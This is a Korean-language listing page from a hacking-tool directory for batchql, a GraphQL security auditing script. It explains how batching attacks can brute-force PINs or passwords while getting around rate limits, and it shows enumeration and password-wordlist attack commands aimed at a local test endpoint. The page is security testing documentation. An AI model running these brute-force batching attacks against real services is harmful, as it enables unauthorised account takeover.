Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
batchql — GraphQL 보안 감사 스크립트로, 배치 GraphQL 쿼리 및 뮤테이션 수행에 중점을 둡니다. | Kitploit
도구/GitHubGitHub/assetnote/batchql
Vulnerability ScannersAPI Security TestingWeb SecurityPenetration Testing
GitHubassetnote/batchql

batchql

GraphQL 보안 감사 스크립트로, 배치 GraphQL 쿼리 및 뮤테이션 수행에 중점을 둡니다.

저장소 보기웹사이트
413424년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

BatchQL

BatchQL은 GraphQL 보안 감사 스크립트로, 일괄 GraphQL 쿼리 및 뮤테이션을 수행하는 데 중점을 둡니다. 이 스크립트는 복잡하지 않으며, 개선을 환영합니다.

GraphQL 일괄 처리 공격 문제 공간을 탐색할 때, 인터넷에 몇 가지 블로그 게시물이 있다는 것을 발견했지만, GraphQL 일괄 처리 공격을 수행할 도구는 없었습니다.

GraphQL 일괄 처리 공격은 구현된 기능에 따라 매우 심각할 수 있습니다. 예를 들어, 이메일로 전송된 4자리 PIN을 요구하는 비밀번호 재설정 기능을 가정해 보겠습니다. 이 도구를 사용하면 단일 GraphQL 쿼리로 10,000개의 PIN 시도를 모두 시도할 수 있습니다. 비밀번호 재설정 흐름의 구현 세부 사항에 따라 속도 제한이나 계정 잠금을 우회할 수 있습니다.

탐지

이 도구는 다음을 탐지할 수 있습니다:

  • 인트로스펙션 쿼리 지원
  • 스키마 제안 탐지
  • 잠재적 CSRF 탐지
  • 쿼리 이름 기반 일괄 처리
  • 쿼리 JSON 목록 기반 일괄 처리

공격

현재 이 도구는 일괄 처리 공격을 위해 JSON 목록 기반 쿼리 전송만 지원합니다. 변수가 쿼리에 포함되어 있거나 JSON 입력으로 제공되는 시나리오를 지원합니다.

사용법

열거

root@kitploit:~
❯ python batch.py -e http://re.local:5000/graphiql -p localhost:8080

Schema suggestions enabled. Use Clairvoyance to recover schema: https://github.com/nikitastupin/clairvoyance
CSRF GET based successful. Please confirm that this is a valid issue.
CSRF POST based successful. Please confirm that this is a valid issue.
Query name based batching: GraphQL batching is possible... preflight request was successful.
Query JSON list based batching: GraphQL batching is possible... preflight request was successful.
Most provide query, wordlist, and size to perform batching attack.

일괄 처리 공격

  1. GraphQL 쿼리가 포함된 파일(예: acc-login.txt)을 저장합니다:
root@kitploit:~
mutation emailLoginRemembered($loginInput: InputRememberedEmailLogin!) {
  emailLoginRemembered(loginInput: $loginInput) {
    authToken {
      accessToken
      __typename
    }
    userSessionResponse {
      userToken
      userIdentity {
        userId
        identityType
        verified
        onboardingStatus
        registrationReferralCode
        userReferralInfo {
          referralCode {
            code
            valid
            __typename
          }
          __typename
        }
        __typename
      }
      __typename
    }
    __typename
  }
  }
  1. 다음 명령을 실행하여 GraphQL 일괄 처리 공격을 수행합니다:
root@kitploit:~
❯ python batch.py --query acc-login.txt --wordlist passwords.txt -v '{"loginInput":{"email":"[email protected]","password":"#VARIABLE#","rememberMe":false}}' --size 100 -e http://re.local:5000/graphiql -p localhost:8080

위 명령은 다음을 수행합니다:

  • 로컬 파일에서 쿼리를 지정합니다 --query acc-login.txt.
  • 단어 목록을 지정합니다 --wordlist passwords.txt
  • 대체 식별자로 변수 입력을 지정합니다 -v {"loginInput":{"email":"[email protected]","password":"#VARIABLE#","rememberMe":false}}
  • 일괄 처리 크기를 지정합니다 --size 100
  • 엔드포인트를 지정합니다 -e http://re.local:5000/graphiql
  • 프록시를 지정합니다 -p localhost:8080

참고 자료

  • Exploiting GraphQL
  • Damn Vulnerable GraphQL Application
  • GraphQL 일괄 처리 공격 - Wallarm
  • 일괄 처리 공격 완화
도구 다운로드